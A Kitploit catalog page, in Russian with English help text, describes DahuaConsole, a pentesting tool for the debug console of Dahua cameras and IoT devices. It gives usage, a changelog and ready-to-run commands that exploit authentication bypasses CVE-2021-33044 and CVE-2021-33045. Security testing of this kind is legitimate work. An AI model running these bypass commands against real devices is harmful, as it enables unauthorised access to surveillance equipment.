Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DahuaConsole — Dahua Console, доступ к внутренней консоли отладки и/или другим исследованным функциям в устройствах Dahua. Не стесняйтесь вносить свой вклад в этот проект. | Kitploit
Инструменты/GitHubGitHub/mcw0/dahuaconsole
Аутентификация и авторизацияБезопасность встроенных системРазведкаБезопасность IoTАнализ уязвимостейЭксплуатацияСбор информацииТестирование на Проникновение
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, доступ к внутренней консоли отладки и/или другим исследованным функциям в устройствах Dahua. Не стесняйтесь вносить свой вклад в этот проект.

31679261 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Dahua Console

  • Версия: Pre-alpha
  • Баги: Есть
  • TODO: Много всего

[Установка зависимостей]

sudo pip3 install -r requirements.txt

[Аргументы]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[Релиз]

[Обновление] 2022-07-10

  • Добавлен метод входа 3des_old для VTH1510CH с прошивкой V2 от 2016 года
    • Небольшое отличие в данных пакета входа
    • Не запрашивать параметры устройства при подключении — это приведёт к сбросу соединения
  • Добавлен --restore config-file.json
    • Загружает json-файл конфигурации или его части.

Пример:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[Обновление]

2021-10-07

Подробности здесь: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

Необходимый протокол: DHIP или HTTP/HTTPS (DHIP не работает с TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

Необходимый протокол: DHIP (DHIP не работает с TLS/SSL @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

Скачать инструмент